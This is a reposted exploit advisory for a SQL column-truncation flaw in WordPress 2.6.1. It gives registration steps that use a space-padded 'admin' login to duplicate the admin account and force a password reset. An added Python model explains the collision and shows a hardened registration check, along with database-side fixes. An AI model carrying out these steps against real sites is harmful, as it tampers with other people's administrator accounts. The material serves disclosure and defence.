WordPress 2.6.1 SQL Column Truncation Vulnerability
Published: 2016-12-21 Source: 查字典 editor

WordPress users should take note.

# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)

#

# found by irk4z[at]yahoo.pl

# homepage: http://irk4z.wordpress.com/

#

# this is not critical vuln [;

#

# first, read this discovery:

# http://www.suspekt.org/2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/

#

# in this hack we can remotely change admin password, if registration enabled

#

# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server.com/wp-login.php?action=register

2. register as:

login: admin x

email: your email

^ admin[55 space chars]x

now, we have duplicated 'admin' account in database

3. go to url: server.com/wp-login.php?action=lostpassword

4. write your email into field and submit this form

5. check your email and go to reset confirmation link

6. admin's password changed, but new password will be sent to correct admin email ;/

# milw0rm.com
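Why step 2 leaves a second 'admin' row, and a registration check that prevents it, shown as an added Python model that is not part of the original advisory or of WordPress. It assumes a 60-character login column, silent truncation of over-long values (non-strict SQL mode) and string comparison that ignores trailing spaces; all function names are hypothetical.

```python
# Added example: model of the truncation collision and a check that blocks it.
# Assumptions: 60-character login column, silent truncation (non-strict SQL
# mode), and comparisons that ignore trailing spaces (PAD SPACE collation).
COLUMN_WIDTH = 60  # assumed column width; 'admin' + 55 spaces fills it exactly


def stored_form(value, width=COLUMN_WIDTH):
    """What a non-strict server keeps: the value cut to the column width."""
    return value[:width]


def db_equal(a, b):
    """PAD SPACE comparison: trailing spaces are not significant."""
    return a.rstrip(" ") == b.rstrip(" ")


def rows_matching(login, table):
    """Rows a `WHERE login = ?` lookup would return."""
    return [row for row in table if db_equal(login, row)]


def naive_register(login, table):
    """Flawed flow: uniqueness is checked on the raw input, then it is stored."""
    if rows_matching(login, table):
        raise ValueError("login already taken")
    table.append(stored_form(login))  # truncation happens after the check


def safe_register(login, table, width=COLUMN_WIDTH):
    """Hardened flow: normalise, refuse what the database would alter, then check."""
    candidate = " ".join(login.split())  # trim and collapse whitespace runs
    if not candidate or len(candidate) > width:
        raise ValueError("login empty or longer than the column")
    if rows_matching(candidate, table):
        raise ValueError("login already taken")
    table.append(candidate)
    return candidate


if __name__ == "__main__":
    submitted = "admin" + " " * 55 + "x"  # constructed from step 2 above
    flawed, hardened = ["admin"], ["admin"]
    naive_register(submitted, flawed)
    print(len(rows_matching("admin", flawed)))    # two rows now answer to 'admin'
    print(repr(safe_register(submitted, hardened)))
    print(len(rows_matching("admin", hardened)))  # still one
```

On the database side, strict SQL mode (which rejects the over-long value instead of truncating it) and a UNIQUE index on the login column close the same gap independently of the application check.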
